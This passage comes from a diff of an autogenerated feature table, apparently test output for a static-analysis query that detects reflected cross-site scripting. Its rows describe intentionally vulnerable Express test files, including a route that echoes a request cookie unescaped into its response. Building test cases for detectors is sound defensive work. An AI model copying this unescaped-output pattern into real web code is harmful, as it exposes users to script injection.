autogenerated/Xss/ReflectedXss/cookies.js:4:11:4:19 | express() | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:3 | app | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:7 | app.use | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:7 | app.use | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:23 | app.use ... rser()) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:23 | app.use ... rser()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:23 | app.use ... rser()) | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:23 | exceptional return of app.use ... rser()) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:23 | exceptional return of app.use ... rser()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:1:5:23 | exceptional return of app.use ... rser()) | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:5:5:5:7 | use | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:5:5:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:5:5:7 | use | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:20 | cookieParser | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:20 | cookieParser | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:20 | cookieParser | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | cookieParser() | CalleeFlexibleAccessPath | app.use | | autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | cookieParser() | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | cookieParser() | calleeImports | express | @@ -21309,6 +142160,24 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | cookieParser() | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | cookieParser() | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | cookieParser() | receiverName | app | +| autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | exceptional return of cookieParser() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | exceptional return of cookieParser() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:5:9:5:22 | exceptional return of cookieParser() | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:7:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:7:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:7:3 | app | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:7:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:7:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:7:7 | app.get | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:10:2 | app.get ... e]);\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:10:2 | app.get ... e]);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:10:2 | app.get ... e]);\\n}) | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:10:2 | exceptional return of app.get ... e]);\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:10:2 | exceptional return of app.get ... e]);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:1:10:2 | exceptional return of app.get ... e]);\\n}) | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:5:7:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:5:7:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:5:7:7 | get | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:7:9:7:23 | '/cookie/:name' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/cookies.js:7:9:7:23 | '/cookie/:name' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/cookies.js:7:9:7:23 | '/cookie/:name' | calleeImports | express | @@ -21316,6 +142185,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/cookies.js:7:9:7:23 | '/cookie/:name' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/cookies.js:7:9:7:23 | '/cookie/:name' | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:7:9:7:23 | '/cookie/:name' | receiverName | app | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:7:25 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:7:25 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:7:25 | this | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:7:25 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:7:25 | this | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | 'arguments' object of anonymous function | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | exceptional return of anonymous function | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | functio ... me]);\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | functio ... me]);\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | functio ... me]);\\n} | calleeImports | express | @@ -21323,6 +142207,62 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | functio ... me]);\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | functio ... me]);\\n} | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | functio ... me]);\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | return of anonymous function | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:26:10:1 | return of anonymous function | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:35:7:37 | req | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:7:40:7:42 | res | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:5 | res | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:5 | res | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:10 | res.send | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:10 | res.send | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | exceptional return of res.sen ... .name]) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | exceptional return of res.sen ... .name]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | exceptional return of res.sen ... .name]) | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | exceptional return of res.sen ... .name]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | exceptional return of res.sen ... .name]) | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | res.sen ... .name]) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | res.sen ... .name]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | res.sen ... .name]) | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | res.sen ... .name]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:3:9:66 | res.sen ... .name]) | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:7:9:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:7:9:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:7:9:10 | send | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:7:9:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:7:9:10 | send | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:34 | "Here, ... okie: " | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:34 | "Here, ... okie: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:34 | "Here, ... okie: " | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:34 | "Here, ... okie: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:34 | "Here, ... okie: " | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:34 | "Here, ... okie: " | stringConcatenatedWith | -endpoint- req.cookies.? | | autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:65 | "Here, ... s.name] | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:65 | "Here, ... s.name] | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:65 | "Here, ... s.name] | contextFunctionInterfaces | | @@ -21331,18 +142271,143 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:65 | "Here, ... s.name] | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:65 | "Here, ... s.name] | fileImports | cookie-parser express | | autogenerated/Xss/ReflectedXss/cookies.js:9:12:9:65 | "Here, ... s.name] | receiverName | res | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:40 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:40 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:40 | req | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:40 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:40 | req | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:48 | req.cookies | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:48 | req.cookies | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:48 | req.cookies | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:48 | req.cookies | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:48 | req.cookies | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:65 | req.coo ... s.name] | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:65 | req.coo ... s.name] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:65 | req.coo ... s.name] | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:65 | req.coo ... s.name] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:65 | req.coo ... s.name] | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:38:9:65 | req.coo ... s.name] | stringConcatenatedWith | 'Here, have a cookie: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/cookies.js:9:42:9:48 | cookies | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:42:9:48 | cookies | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:42:9:48 | cookies | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:42:9:48 | cookies | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:42:9:48 | cookies | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:52 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:52 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:52 | req | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:52 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:52 | req | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:59 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:59 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:59 | req.params | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:59 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:59 | req.params | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:64 | req.params.name | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:64 | req.params.name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:64 | req.params.name | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:64 | req.params.name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:50:9:64 | req.params.name | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:54:9:59 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:54:9:59 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:54:9:59 | params | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:54:9:59 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:54:9:59 | params | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/cookies.js:9:61:9:64 | name | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/cookies.js:9:61:9:64 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/cookies.js:9:61:9:64 | name | enclosingFunctionBody | req res res send Here, have a cookie: req cookies req params name | +| autogenerated/Xss/ReflectedXss/cookies.js:9:61:9:64 | name | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/cookies.js:9:61:9:64 | name | fileImports | cookie-parser express | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:0 | this | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:1 | isVarName | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:1 | isVarName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:1 | isVarName | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:1:1:1 | require | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:11 | express | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:32 | express | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:5:1:32 | express ... press') | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:21 | require | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:32 | exceptional return of require('express') | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:1:15:1:32 | require('express') | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/etherpad.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/etherpad.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/etherpad.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/etherpad.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/etherpad.js:1:23:1:31 | 'express' | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:13 | isVarName | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:13 | isVarName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:13 | isVarName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:13 | isVarName | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:38 | isVarNa ... -name') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:38 | isVarNa ... -name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:38 | isVarNa ... -name') | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:38 | isVarName | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:38 | isVarName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:5:2:38 | isVarName | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:23 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:23 | require | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:38 | exceptional return of require ... -name') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:38 | exceptional return of require ... -name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:38 | exceptional return of require ... -name') | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:38 | require ... -name') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:38 | require ... -name') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:2:17:2:38 | require ... -name') | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:2:25:2:37 | 'is-var-name' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/etherpad.js:2:25:2:37 | 'is-var-name' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/etherpad.js:2:25:2:37 | 'is-var-name' | calleeImports | | | autogenerated/Xss/ReflectedXss/etherpad.js:2:25:2:37 | 'is-var-name' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/etherpad.js:2:25:2:37 | 'is-var-name' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/etherpad.js:2:25:2:37 | 'is-var-name' | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:7 | app | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:19 | app | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:5:3:19 | app = express() | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:17 | express | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:19 | exceptional return of express() | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:3:11:3:19 | express() | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:5:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:5:3 | app | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:5:1:5:7 | app.get | 